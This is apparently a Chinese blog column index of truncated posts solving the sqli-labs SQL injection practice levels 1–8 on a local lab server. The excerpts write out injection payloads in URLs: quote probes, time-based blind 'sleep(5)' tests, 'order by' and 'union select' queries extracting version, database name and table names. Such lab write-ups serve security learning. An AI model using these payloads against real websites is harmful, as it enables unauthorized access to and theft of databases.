sql-libs
关注
分享
扫一扫
详细解说sql-lib的通关过程及遇到的问题
‘’
midsummer_woo
这个作者很懒,什么都没留下…
展开
-
sql-libs——less8
http://192.168.31.164:9002/Less-8/?id=1'加'不再显示“you are in”http://192.168.31.164:9002/Less-8/?id=1'--+加'--+显示正常http://192.168.31.164:9002/Less-8/?id=1' and sleep(5)--+加入and sleep(5)发现延迟5s说明存在SQL注入漏洞http://192.168.31.164:9002/Less-8/?id=1' and if原创 2021-10-25 21:38:54 · 282 阅读 · 0 评论 -
sql-libs——less6
首先打开页面,输入? id=1,发现没有任何数据爆出http://192.168.31.164:9002/Less-6/?id=-1'试一下,未发现报错。http://192.168.31.164:9002/Less-6/?id=1'"试一下,发现报错,说明存在sql注入。后续步骤同less-5原创 2021-10-17 21:36:31 · 108 阅读 · 0 评论 -
sql-libs——less5(盲注)
首先打开页面,输入? id=1,发现没有任何数据爆出这时把ID换成一个不存在数据-1试一下,发现连 you are in …都没有了,这就是典型的盲注,正确时显示you are in …,不正确时什么也不显示。http://192.168.0.5:9002/Less-5/?id=-1加'试一下,发现报错,说明存在SQL注入漏洞。http://192.168.0.5:9002/Less-5/?id=-1'首先我们使用length()函数获取数据库名字的长度这里呢等于7没有返回任何信息,证明数原创 2021-10-16 22:12:03 · 532 阅读 · 0 评论 -
mysql中information_schema数据库在SQL注入中的应用详解
mysql5.0以上和mysql5.0以下的区别5.0以下没有information_schema这个数据库,无法列表名等,只能暴力跑表名。5.0以下是多用户单操作,5.0以上是多用户多操做。原创 2021-10-16 21:24:42 · 359 阅读 · 0 评论 -
sql-libs——less4
带入ID参数加'不报错加"报错,根据报错信息看是通过)进行闭合的使用")进行闭合后会发现返回正常剩余步骤同less3原创 2021-10-12 14:55:32 · 125 阅读 · 0 评论 -
sql-libs——less3
http://192.168.0.5:9002/Less-3/?id=5%27)%20order%20by%203%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,2,3%20–+http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,version(),database()%20–+http://192.168.0.5:9002/Less-原创 2021-10-12 14:37:48 · 165 阅读 · 0 评论 -
sql-libs——less2
带入执行的SQL语句$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";判断列数http://192.168.0.5:9002/Less-2/?id=1 order by 3http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,3爆表名http://192.168.0.5:9002/Less-2/?id=-1 union select 1,2,group_concat(table_na原创 2021-10-11 16:04:45 · 1438 阅读 · 0 评论 -
sql-libs——less1
打开第一关发现没有任何参数,根据提示“请输入ID作为带有数字值的参数”构造url,正常显示。加’ 判断有无注入,执行后报错,可判断为数字型注入...原创 2021-10-11 15:28:35 · 410 阅读 · 0 评论